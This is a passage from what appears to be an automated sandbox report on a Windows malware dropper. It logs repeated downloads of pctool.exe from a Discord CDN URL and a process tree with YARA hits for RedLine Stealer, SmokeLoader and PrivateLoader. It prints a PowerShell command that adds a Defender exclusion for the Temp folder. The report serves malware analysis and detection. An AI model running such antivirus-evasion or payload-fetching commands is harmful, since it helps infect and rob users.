                                      Set-Cookie: __cf_bm=gpcZ2YLCYhCVYKwNMOsyC1cDx2Cm7SmZP6sLAkgL4GY-1724230835-1.0.1.1-v8oAKQ.8gnbRzmu70mkw6aXZaJvh1i.kyEy1DmlgLadqmROA2Enok1Df51JCTb1jeNQG5nmTp7gugIC6HqR_.w; path=/; expires=Wed, 21-Aug-24 09:30:35 GMT; domain=.discordapp.com; HttpOnly; Secure
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L9atcKiCru3a9Vu2yNTHddZA0vYztIvdNjQyVOFdOSmowUYklsDcODMCWdR6PSimiI2hiLSGFYx24cAZIH8tPLUTnDaABavOs2o8DsAmXKqaYb4bWflN7pLIi51h6UFNy4Rkvw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Set-Cookie: _cfuvid=Si5eXBO9Nadt0DBd2XxLIKh5JF6xeOJJa_I1aWjpypI-1724230835705-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                      Server: cloudflare
                                      CF-RAY: 8b696f031de94304-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-08-21 09:00:35 UTC36INData Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                                      Data Ascii: This content is no longer available.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      40192.168.2.460100162.159.130.2334437972C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe
                                      TimestampBytes transferredDirectionData
                                      2024-08-21 09:00:41 UTC104OUTGET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1
                                      Host: cdn.discordapp.com
                                      2024-08-21 09:00:41 UTC1051INHTTP/1.1 404 Not Found
                                      Date: Wed, 21 Aug 2024 09:00:41 GMT
                                      Content-Type: text/plain;charset=UTF-8
                                      Content-Length: 36
                                      Connection: close
                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                      Set-Cookie: __cf_bm=CG2bMzkwFhzo_6W5zDhheua_EGuaOJe92elWCzkdJ7U-1724230841-1.0.1.1-ZKTjsN3pMRE.Iuyxe9APXiV.pZvzxOe8Fd6y6eIFfcISZd9uKltep5pGtCoHldMc1ZVE_Xa4aztuGNctbG2KkQ; path=/; expires=Wed, 21-Aug-24 09:30:41 GMT; domain=.discordapp.com; HttpOnly; Secure
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XFgtSjlnOS%2FletsIhKkOOfv942q9%2BSKOv5UBXQUL7dZOBKYWN90PIP9%2FMIUCjz3fLi8AOuGkRKC9lIbkdp3xHKK29YQrXGeOtyyWcaKwTIgW2oEf3lzcwkQxDIr4%2Fw%2FG11kC8w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Set-Cookie: _cfuvid=4.fEzU4NP3qPT67aKbxzdo9khcXBKp5geySeef9sOzA-1724230841350-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                      Server: cloudflare
                                      CF-RAY: 8b696f265a601971-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-08-21 09:00:41 UTC36INData Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                                      Data Ascii: This content is no longer available.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      41192.168.2.460104162.159.130.2334437972C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe
                                      TimestampBytes transferredDirectionData
                                      2024-08-21 09:00:47 UTC104OUTGET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1
                                      Host: cdn.discordapp.com
                                      2024-08-21 09:00:47 UTC1049INHTTP/1.1 404 Not Found
                                      Date: Wed, 21 Aug 2024 09:00:47 GMT
                                      Content-Type: text/plain;charset=UTF-8
                                      Content-Length: 36
                                      Connection: close
                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                      Set-Cookie: __cf_bm=ryhG8PrW2GoqettBiFQJoUr1.UAq9UIrv2sa1sis4eU-1724230847-1.0.1.1-rQ0jACcnVALW3kY9Dn9PdYHy2pVswGdOJ.1wnJAS41QrTW8CoyiULmLtB90_rNGNoEA97cgTm76x.KUwAi2h9Q; path=/; expires=Wed, 21-Aug-24 09:30:47 GMT; domain=.discordapp.com; HttpOnly; Secure
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cfk1s4rnAVdavSZEQgSvlRiFi9I9tTaahZVrbIQAgOl%2Fe3CJBMLPYg4nWCnvwfT2n8FyNJwAjiWvcIaruaWoWP06yUsiBk29A%2FhSDs0wbto0GJ3yLqWg3%2FNV3rdZ%2Fs21l8cAZw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Set-Cookie: _cfuvid=uxUy69UtfTGgc_w3guur9ZGxSDrlJY0eiLq0bX9hFiM-1724230847131-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                      Server: cloudflare
                                      CF-RAY: 8b696f4a7ed37292-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-08-21 09:00:47 UTC36INData Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                                      Data Ascii: This content is no longer available.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      42192.168.2.460108162.159.130.2334437972C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe
                                      TimestampBytes transferredDirectionData
                                      2024-08-21 09:00:52 UTC128OUTGET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1
                                      Host: cdn.discordapp.com
                                      Connection: Keep-Alive
                                      2024-08-21 09:00:52 UTC1043INHTTP/1.1 404 Not Found
                                      Date: Wed, 21 Aug 2024 09:00:52 GMT
                                      Content-Type: text/plain;charset=UTF-8
                                      Content-Length: 36
                                      Connection: close
                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                      Set-Cookie: __cf_bm=nkUBmIBtxze4Ei2AYFyKtFZYwfCS9uHdCpJT1I11QWg-1724230852-1.0.1.1-DuQqOCTrKAGVK5GA3QCvkdor8QGv03DvT1pL.k5vTnnT14a8KQrXAur6CwkSjInS0e9p5skkNd3FWLB818eXNQ; path=/; expires=Wed, 21-Aug-24 09:30:52 GMT; domain=.discordapp.com; HttpOnly; Secure
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=K9K3VOPZsMXZ9y4Za9KPzV7go3MxZ24piwL9DXEilTNB6JBS8%2F6CGW8U3NlQmwE4QA1VQQi1RI209N6NbqNFNrLgdyIF14vPkZcGlJ1fiaI40na4gaYgdzn5v5WnJvRgtSfbAw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Set-Cookie: _cfuvid=NoM7KgtlJXSIOluf.rpbowjI0XHoHepIeAUSdyGsi88-1724230852783-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                      Server: cloudflare
                                      CF-RAY: 8b696f6dda02c35f-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-08-21 09:00:52 UTC36INData Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                                      Data Ascii: This content is no longer available.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      43192.168.2.460112162.159.130.2334437972C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe
                                      TimestampBytes transferredDirectionData
                                      2024-08-21 09:00:58 UTC104OUTGET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1
                                      Host: cdn.discordapp.com
                                      2024-08-21 09:00:58 UTC1053INHTTP/1.1 404 Not Found
                                      Date: Wed, 21 Aug 2024 09:00:58 GMT
                                      Content-Type: text/plain;charset=UTF-8
                                      Content-Length: 36
                                      Connection: close
                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                      Set-Cookie: __cf_bm=ZYThuz8gU4Zjf8bttJRbbZ66RSbATbPjyH27xidCT6s-1724230858-1.0.1.1-vbfA_wmpp9QGlNswZmGk3p3f27MLEjPzJ9.LzgZhJa0nWIDFeuv6uul7SZQe04pVdtG2BgLBV83XQ8axMPgkXA; path=/; expires=Wed, 21-Aug-24 09:30:58 GMT; domain=.discordapp.com; HttpOnly; Secure
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fPAZjCZKp1HxtZ9xciX%2B8fE%2F7xz5v%2B5nLZyQ7UKXVl7LsgO4dHPkTYbIXE2sFRu99hu4bepM3viw%2BJW8%2FfqntC6JWw1ztFlh0PHARghQLEBE0gkETH5d%2FxyCNGGPcLTUSU41og%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Set-Cookie: _cfuvid=TAdansgSXPEGma0KpPyPjPeyk_2zoSlOqI0w2mmFEXg-1724230858423-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                      Server: cloudflare
                                      CF-RAY: 8b696f911e4e43a6-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-08-21 09:00:58 UTC36INData Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                                      Data Ascii: This content is no longer available.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      44192.168.2.460117162.159.133.2334437972C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe
                                      TimestampBytes transferredDirectionData
                                      2024-08-21 09:01:04 UTC128OUTGET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1
                                      Host: cdn.discordapp.com
                                      Connection: Keep-Alive
                                      2024-08-21 09:01:04 UTC1055INHTTP/1.1 404 Not Found
                                      Date: Wed, 21 Aug 2024 09:01:04 GMT
                                      Content-Type: text/plain;charset=UTF-8
                                      Content-Length: 36
                                      Connection: close
                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                      Set-Cookie: __cf_bm=QE8sXrft4O235HQa2l0sHP7XbF3mMirvFzhwqy9UYBI-1724230864-1.0.1.1-fqGuNa7aYkVO0oLFCATi7wnSkwKvyKFHvO6GYaAAjeBBnpCqk40xvQnaLeOu_eHSBHZkgaGb9_TDCCg3LqpWNw; path=/; expires=Wed, 21-Aug-24 09:31:04 GMT; domain=.discordapp.com; HttpOnly; Secure
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WptpOnAp5y63yFrvDHjn6DW7Qu7%2BsmIs%2BatK502qbb33%2FAoNB1ZCO3EcB8TQ6L8K%2FduH9XbYhCO1YSyJynZF3gZIbOj9y%2FypDhypKWPd%2FSwK%2BeoJ6r5Hr3z0SM12MADis44rOw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Set-Cookie: _cfuvid=3.FDysOfRq8HCNmLtnF4lfo84o7BtaNJya51IP6dQgQ-1724230864112-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                      Server: cloudflare
                                      CF-RAY: 8b696fb4aece19d7-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-08-21 09:01:04 UTC36INData Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                                      Data Ascii: This content is no longer available.


                                      Click to jump to process

                                      Click to jump to process

                                      Click to dive into process behavior distribution

                                      Click to jump to process

                                      Target ID:0
                                      Start time:04:57:00
                                      Start date:21/08/2024
                                      Path:C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe"
                                      Imagebase:0x400000
                                      File size:3'545'603 bytes
                                      MD5 hash:EFA310FFCB46AA3768DE9AAE3A8FDCDA
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      Target ID:1
                                      Start time:04:57:00
                                      Start date:21/08/2024
                                      Path:C:\Users\user\AppData\Local\Temp\setup_installer.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\AppData\Local\Temp\setup_installer.exe"
                                      Imagebase:0x400000
                                      File size:3'527'334 bytes
                                      MD5 hash:264FBE02A8ACAE2BA9A5144F8B947AAE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_PrivateLoader, Description: Yara detected PrivateLoader, Source: 00000001.00000003.1691383572.00000000031A1000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Generic_malware, Description: Yara Generic_malware, Source: 00000001.00000003.1691383572.00000000031C9000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: MALWARE_Win_DLInjector03, Description: Detects unknown loader / injector, Source: 00000001.00000003.1691383572.0000000002F30000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                      Antivirus matches:
                                      • Detection: 68%, ReversingLabs
                                      Reputation:low
                                      Has exited:true

                                      Target ID:2
                                      Start time:04:57:02
                                      Start date:21/08/2024
                                      Path:C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe"
                                      Imagebase:0x400000
                                      File size:2'249'157 bytes
                                      MD5 hash:33D05F6171D18F49EDD9C5B1BC5B8C72
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Antivirus matches:
                                      • Detection: 68%, ReversingLabs
                                      Reputation:low
                                      Has exited:true

                                      Target ID:3
                                      Start time:04:57:02
                                      Start date:21/08/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:false

                                      Target ID:4
                                      Start time:04:57:03
                                      Start date:21/08/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp"
                                      Imagebase:0x240000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:5
                                      Start time:04:57:03
                                      Start date:21/08/2024
                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):true
                                      Commandline:powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp"
                                      Imagebase:0x910000
                                      File size:433'152 bytes
                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:6
                                      Start time:04:57:03
                                      Start date:21/08/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\system32\cmd.exe /c Mon17742f90b916675f2.exe
                                      Imagebase:0x240000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:false

                                      Target ID:7
                                      Start time:04:57:03
                                      Start date:21/08/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\system32\cmd.exe /c Mon17eac6d534bfd22c7.exe
                                      Imagebase:0x240000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:8
                                      Start time:04:57:03
                                      Start date:21/08/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\system32\cmd.exe /c Mon17c604381c7047e.exe
                                      Imagebase:0x240000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:9
                                      Start time:04:57:03
                                      Start date:21/08/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\system32\cmd.exe /c Mon17e1fac3fd3d84b.exe
                                      Imagebase:0x240000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:10
                                      Start time:04:57:03
                                      Start date:21/08/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\system32\cmd.exe /c Mon17b5f403be4d8d6b.exe
                                      Imagebase:0x240000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:11
                                      Start time:04:57:03
                                      Start date:21/08/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\system32\cmd.exe /c Mon17f45359eb9.exe
                                      Imagebase:0x240000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:12
                                      Start time:04:57:03
                                      Start date:21/08/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\system32\cmd.exe /c Mon1785436ae78.exe /mixone
                                      Imagebase:0x240000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:false

                                      Target ID:13
                                      Start time:04:57:03
                                      Start date:21/08/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\system32\cmd.exe /c Mon17948100733a95c58.exe
                                      Imagebase:0x240000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:14
                                      Start time:04:57:03
                                      Start date:21/08/2024
                                      Path:C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exe
                                      Wow64 process (32bit):true
                                      Commandline:Mon17eac6d534bfd22c7.exe
                                      Imagebase:0xbd0000
                                      File size:442'368 bytes
                                      MD5 hash:5721981400FAF8EDB9CB2FA1E71404A2
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.1820493066.0000000003E41000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000E.00000002.1820493066.0000000003E41000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 0000000E.00000002.1820493066.0000000003E41000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                      • Rule: Windows_Trojan_RedLineStealer_3d9371fd, Description: unknown, Source: 0000000E.00000002.1820493066.0000000003E41000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                      Antivirus matches:
                                      • Detection: 100%, Avira
                                      • Detection: 100%, Joe Sandbox ML
                                      • Detection: 88%, ReversingLabs
                                      Has exited:true

                                      Target ID:15
                                      Start time:04:57:03
                                      Start date:21/08/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\system32\cmd.exe /c Mon179e1058f256.exe
                                      Imagebase:0x240000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:false

                                      Target ID:16
                                      Start time:04:57:03
                                      Start date:21/08/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\system32\cmd.exe /c Mon1795d04d4bd.exe
                                      Imagebase:0x240000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:17
                                      Start time:04:57:03
                                      Start date:21/08/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\system32\cmd.exe /c Mon178817e243.exe
                                      Imagebase:0x240000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:false

                                      Target ID:18
                                      Start time:04:57:03
                                      Start date:21/08/2024
                                      Path:C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exe
                                      Wow64 process (32bit):true
                                      Commandline:Mon17742f90b916675f2.exe
                                      Imagebase:0x850000
                                      File size:91'648 bytes
                                      MD5 hash:37A1C118196892AA451573A142EA05D5
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Antivirus matches:
                                      • Detection: 100%, Avira
                                      • Detection: 68%, ReversingLabs
                                      Has exited:false

                                      Target ID:19
                                      Start time:04:57:03
                                      Start date:21/08/2024
                                      Path:C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exe
                                      Wow64 process (32bit):false
                                      Commandline:Mon17c604381c7047e.exe
                                      Imagebase:0x7ff72f5c0000
                                      File size:1'422'336 bytes
                                      MD5 hash:F3B4EE77D66819821E9921B61F969BAE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_Generic_malware, Description: Yara Generic_malware, Source: 00000013.00000000.1712308537.00007FF72F6C6000.00000002.00000001.01000000.00000011.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Generic_malware, Description: Yara Generic_malware, Source: 00000013.00000002.1994726155.00007FF72F6C6000.00000002.00000001.01000000.00000011.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Generic_malware, Description: Yara Generic_malware, Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exe, Author: Joe Security
                                      Antivirus matches:
                                      • Detection: 100%, Avira
                                      • Detection: 100%, Joe Sandbox ML
                                      • Detection: 85%, ReversingLabs
                                      Has exited:true

                                      Target ID:21
                                      Start time:04:57:03
                                      Start date:21/08/2024
                                      Path:C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe
                                      Wow64 process (32bit):true
                                      Commandline:Mon17e1fac3fd3d84b.exe
                                      Imagebase:0xf0000
                                      File size:1'229'031 bytes
                                      MD5 hash:7C6B2DC2C253C2A6A3708605737AA9AE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Antivirus matches:
                                      • Detection: 100%, Avira
                                      • Detection: 100%, Joe Sandbox ML
                                      • Detection: 58%, ReversingLabs
                                      Has exited:true

                                      Target ID:22
                                      Start time:04:57:03
                                      Start date:21/08/2024
                                      Path:C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe
                                      Wow64 process (32bit):false
                                      Commandline:Mon178817e243.exe
                                      Imagebase:0xe60000
                                      File size:8'192 bytes
                                      MD5 hash:C213A2444632FFDF0425E0288BCA48B9
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe, Author: Joe Security
                                      • Rule: MALWARE_Win_DLInjector04, Description: Detects downloader / injector, Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe, Author: ditekSHen
                                      Antivirus matches:
                                      • Detection: 100%, Avira
                                      • Detection: 100%, Joe Sandbox ML
                                      • Detection: 92%, ReversingLabs
                                      Has exited:false

                                      Target ID:23
                                      Start time:04:57:03
                                      Start date:21/08/2024
                                      Path:C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17b5f403be4d8d6b.exe
                                      Wow64 process (32bit):true
                                      Commandline:Mon17b5f403be4d8d6b.exe
                                      Imagebase:0x9c0000
                                      File size:412'160 bytes
                                      MD5 hash:06EE576F9FDC477C6A91F27E56339792
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_PrivateLoader, Description: Yara detected PrivateLoader, Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17b5f403be4d8d6b.exe, Author: Joe Security
                                      Antivirus matches:
                                      • Detection: 100%, Avira
                                      • Detection: 66%, ReversingLabs
                                      Has exited:true

                                      Target ID:24
                                      Start time:04:57:03
                                      Start date:21/08/2024
                                      Path:C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17f45359eb9.exe
                                      Wow64 process (32bit):true
                                      Commandline:Mon17f45359eb9.exe
                                      Imagebase:0x400000
                                      File size:348'672 bytes
                                      MD5 hash:BE60D71B303F2AAE5618315147C7D3F9
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000018.00000002.1990631383.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000018.00000002.1993787131.0000000001841000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000018.00000002.1993787131.0000000001841000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000018.00000002.1990867892.0000000001710000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000018.00000002.1990867892.0000000001710000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000018.00000002.1993661791.000000000176E000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                      Antivirus matches:
                                      • Detection: 100%, Avira
                                      • Detection: 100%, Joe Sandbox ML
                                      • Detection: 88%, ReversingLabs
                                      Has exited:true

                                      Target ID:25
                                      Start time:04:57:04
                                      Start date:21/08/2024
                                      Path:C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17948100733a95c58.exe
                                      Wow64 process (32bit):true
                                      Commandline:Mon17948100733a95c58.exe
                                      Imagebase:0x560000
                                      File size:432'128 bytes
